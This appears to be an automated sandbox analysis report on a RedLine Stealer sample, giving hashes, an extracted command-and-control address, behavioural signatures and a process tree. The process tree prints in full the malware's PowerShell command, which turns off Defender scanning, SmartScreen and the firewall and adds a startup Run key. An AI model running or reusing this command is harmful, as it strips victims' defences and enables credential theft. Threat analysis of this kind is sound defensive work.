Analysis
-
max time kernel
124s -
max time network
126s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
26-09-2021 23:02
Static task
static1
Behavioral task
behavioral1
Sample
96c2ef023febbd4e3773bbb3a59e54c3.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
96c2ef023febbd4e3773bbb3a59e54c3.exe
Resource
win10v20210408
General
-
Target
96c2ef023febbd4e3773bbb3a59e54c3.exe
-
Size
417KB
-
MD5
96c2ef023febbd4e3773bbb3a59e54c3
-
SHA1
8e20dc3097d3380f1b2c567a05b3a7d8dae713bf
-
SHA256
770e6bbe4c4f4e7abfbb4a533d28f8e44c5a374aa05dc3c333d7f15594e217e7
-
SHA512
f5e45c4c6f09c1d1d40832b1611fbff8ba822964cdb40e397254ae143a44f8c822ca7b5dcbdd7a3ddbd5f1b383fd7c1db2233ac9301fbc58f3c75f280abb9370
Malware Config
Extracted
redline
7W06ZPHY
188.34.176.164:80
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Start = "4" powershell.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/3832-311-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral2/memory/3832-312-0x000000000041C5D6-mapping.dmp family_redline behavioral2/memory/3832-321-0x0000000005350000-0x0000000005956000-memory.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 4028 created 2092 4028 WerFault.exe rcn.exe -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
rcn.exeUpSys.exeUpSys.exeUpSys.exepid process 2092 rcn.exe 3540 UpSys.exe 3000 UpSys.exe 1632 UpSys.exe -
Modifies Windows Firewall 1 TTPs
-
Drops startup file 1 IoCs
Processes:
rcn.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk rcn.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe" powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
96c2ef023febbd4e3773bbb3a59e54c3.exedescription pid process target process PID 1096 set thread context of 3832 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4028 2092 WerFault.exe rcn.exe -
Modifies data under HKEY_USERS 52 IoCs
Processes:
powershell.exeUpSys.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ UpSys.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Processes:
rcn.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e rcn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 rcn.exe -
Suspicious behavior: EnumeratesProcesses 59 IoCs
Processes:
powershell.exepowershell.exe96c2ef023febbd4e3773bbb3a59e54c3.exe96c2ef023febbd4e3773bbb3a59e54c3.exercn.exepowershell.exeWerFault.exeUpSys.exeUpSys.exepowershell.exepid process 1268 powershell.exe 1268 powershell.exe 1268 powershell.exe 3720 powershell.exe 3720 powershell.exe 3720 powershell.exe 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 3832 96c2ef023febbd4e3773bbb3a59e54c3.exe 3832 96c2ef023febbd4e3773bbb3a59e54c3.exe 2092 rcn.exe 2092 rcn.exe 2092 rcn.exe 2092 rcn.exe 2064 powershell.exe 2064 powershell.exe 2064 powershell.exe 2092 rcn.exe 2092 rcn.exe 2092 rcn.exe 2092 rcn.exe 4028 WerFault.exe 4028 WerFault.exe 4028 WerFault.exe 4028 WerFault.exe 4028 WerFault.exe 4028 WerFault.exe 4028 WerFault.exe 4028 WerFault.exe 4028 WerFault.exe 4028 WerFault.exe 4028 WerFault.exe 4028 WerFault.exe 4028 WerFault.exe 4028 WerFault.exe 4028 WerFault.exe 3540 UpSys.exe 3540 UpSys.exe 3540 UpSys.exe 3540 UpSys.exe 3000 UpSys.exe 3000 UpSys.exe 3000 UpSys.exe 3000 UpSys.exe 804 powershell.exe 804 powershell.exe 804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1268 powershell.exe Token: SeIncreaseQuotaPrivilege 1268 powershell.exe Token: SeSecurityPrivilege 1268 powershell.exe Token: SeTakeOwnershipPrivilege 1268 powershell.exe Token: SeLoadDriverPrivilege 1268 powershell.exe Token: SeSystemProfilePrivilege 1268 powershell.exe Token: SeSystemtimePrivilege 1268 powershell.exe Token: SeProfSingleProcessPrivilege 1268 powershell.exe Token: SeIncBasePriorityPrivilege 1268 powershell.exe Token: SeCreatePagefilePrivilege 1268 powershell.exe Token: SeBackupPrivilege 1268 powershell.exe Token: SeRestorePrivilege 1268 powershell.exe Token: SeShutdownPrivilege 1268 powershell.exe Token: SeDebugPrivilege 1268 powershell.exe Token: SeSystemEnvironmentPrivilege 1268 powershell.exe Token: SeRemoteShutdownPrivilege 1268 powershell.exe Token: SeUndockPrivilege 1268 powershell.exe Token: SeManageVolumePrivilege 1268 powershell.exe Token: 33 1268 powershell.exe Token: 34 1268 powershell.exe Token: 35 1268 powershell.exe Token: 36 1268 powershell.exe Token: SeIncreaseQuotaPrivilege 1268 powershell.exe Token: SeSecurityPrivilege 1268 powershell.exe Token: SeTakeOwnershipPrivilege 1268 powershell.exe Token: SeLoadDriverPrivilege 1268 powershell.exe Token: SeSystemProfilePrivilege 1268 powershell.exe Token: SeSystemtimePrivilege 1268 powershell.exe Token: SeProfSingleProcessPrivilege 1268 powershell.exe Token: SeIncBasePriorityPrivilege 1268 powershell.exe Token: SeCreatePagefilePrivilege 1268 powershell.exe Token: SeBackupPrivilege 1268 powershell.exe Token: SeRestorePrivilege 1268 powershell.exe Token: SeShutdownPrivilege 1268 powershell.exe Token: SeDebugPrivilege 1268 powershell.exe Token: SeSystemEnvironmentPrivilege 1268 powershell.exe Token: SeRemoteShutdownPrivilege 1268 powershell.exe Token: SeUndockPrivilege 1268 powershell.exe Token: SeManageVolumePrivilege 1268 powershell.exe Token: 33 1268 powershell.exe Token: 34 1268 powershell.exe Token: 35 1268 powershell.exe Token: 36 1268 powershell.exe Token: SeDebugPrivilege 3720 powershell.exe Token: SeIncreaseQuotaPrivilege 3720 powershell.exe Token: SeSecurityPrivilege 3720 powershell.exe Token: SeTakeOwnershipPrivilege 3720 powershell.exe Token: SeLoadDriverPrivilege 3720 powershell.exe Token: SeSystemProfilePrivilege 3720 powershell.exe Token: SeSystemtimePrivilege 3720 powershell.exe Token: SeProfSingleProcessPrivilege 3720 powershell.exe Token: SeIncBasePriorityPrivilege 3720 powershell.exe Token: SeCreatePagefilePrivilege 3720 powershell.exe Token: SeBackupPrivilege 3720 powershell.exe Token: SeRestorePrivilege 3720 powershell.exe Token: SeShutdownPrivilege 3720 powershell.exe Token: SeDebugPrivilege 3720 powershell.exe Token: SeSystemEnvironmentPrivilege 3720 powershell.exe Token: SeRemoteShutdownPrivilege 3720 powershell.exe Token: SeUndockPrivilege 3720 powershell.exe Token: SeManageVolumePrivilege 3720 powershell.exe Token: 33 3720 powershell.exe Token: 34 3720 powershell.exe Token: 35 3720 powershell.exe -
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
96c2ef023febbd4e3773bbb3a59e54c3.exe96c2ef023febbd4e3773bbb3a59e54c3.exercn.exepowershell.exeUpSys.exedescription pid process target process PID 1096 wrote to memory of 1268 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe powershell.exe PID 1096 wrote to memory of 1268 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe powershell.exe PID 1096 wrote to memory of 1268 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe powershell.exe PID 1096 wrote to memory of 3720 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe powershell.exe PID 1096 wrote to memory of 3720 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe powershell.exe PID 1096 wrote to memory of 3720 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe powershell.exe PID 1096 wrote to memory of 2916 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe PID 1096 wrote to memory of 2916 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe PID 1096 wrote to memory of 2916 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe PID 1096 wrote to memory of 2664 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe PID 1096 wrote to memory of 2664 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe PID 1096 wrote to memory of 2664 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe PID 1096 wrote to memory of 3452 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe PID 1096 wrote to memory of 3452 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe PID 1096 wrote to memory of 3452 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe PID 1096 wrote to memory of 3832 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe PID 1096 wrote to memory of 3832 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe PID 1096 wrote to memory of 3832 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe PID 1096 wrote to memory of 3832 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe PID 1096 wrote to memory of 3832 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe PID 1096 wrote to memory of 3832 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe PID 1096 wrote to memory of 3832 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe PID 1096 wrote to memory of 3832 1096 96c2ef023febbd4e3773bbb3a59e54c3.exe 96c2ef023febbd4e3773bbb3a59e54c3.exe PID 3832 wrote to memory of 2092 3832 96c2ef023febbd4e3773bbb3a59e54c3.exe rcn.exe PID 3832 wrote to memory of 2092 3832 96c2ef023febbd4e3773bbb3a59e54c3.exe rcn.exe PID 2092 wrote to memory of 2064 2092 rcn.exe powershell.exe PID 2092 wrote to memory of 2064 2092 rcn.exe powershell.exe PID 2064 wrote to memory of 3540 2064 powershell.exe UpSys.exe PID 2064 wrote to memory of 3540 2064 powershell.exe UpSys.exe PID 2064 wrote to memory of 2216 2064 powershell.exe netsh.exe PID 2064 wrote to memory of 2216 2064 powershell.exe netsh.exe PID 1632 wrote to memory of 804 1632 UpSys.exe powershell.exe PID 1632 wrote to memory of 804 1632 UpSys.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe"C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3720
-
-
C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exeC:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe2⤵PID:2916
-
-
C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exeC:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe2⤵PID:2664
-
-
C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exeC:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe2⤵PID:3452
-
-
C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exeC:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Users\Admin\AppData\Local\Temp\rcn.exe"C:\Users\Admin\AppData\Local\Temp\rcn.exe"3⤵
- Executes dropped EXE
- Drops startup file
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)4⤵
- Modifies security service
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3540 -
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3000 -
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"8⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:804
-
-
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off5⤵PID:2216
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2092 -s 13484⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:4028
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
cfadb3a07eb0470aeeec9fa3dbb3ad67
SHA137d6410c23e9ca02bc7ed3c75743b3295dd19712
SHA2561fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56
SHA512713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a
-
MD5
efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
MD5
efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
MD5
efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
MD5
efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\96c2ef023febbd4e3773bbb3a59e54c3.exe.log
MD5377926f80239dae91115ba6b0834d596
SHA1fe1c81f4b1f0ec6aa4534f4a9d988138b78db112
SHA256d8493b667906732f79d5670c5697e5ffe8ccbd7040be4784af8ea109c1b5ba1b
SHA512ad5d3c5d1d557ac27cbcba4d1ba97aa10b393cb88a8f2e36a6027db281c08dcbb0cfd0cd3b2b5198f7cc0513003074ab0878bab110621a408f3c6ca112e8291e
-
MD5
e71a0a7e48b10bde0a9c54387762f33e
SHA1fed75947f1163b00096e24a46e67d9c21e7eeebd
SHA25683d7be67d0eb544d655cc8e8eb687c26f772d6a40ebf8394e5c12b248976a2de
SHA512394c25daef6143de894505189b1edcdffb82fd6ab9de1c9e43865fb790803ff5c384debfe16236d4a9d95a78d3eea548d3cef332ed5a6881ac9c50d252c3c34a
-
MD5
78bdb7f359f9a2427667da82810347fe
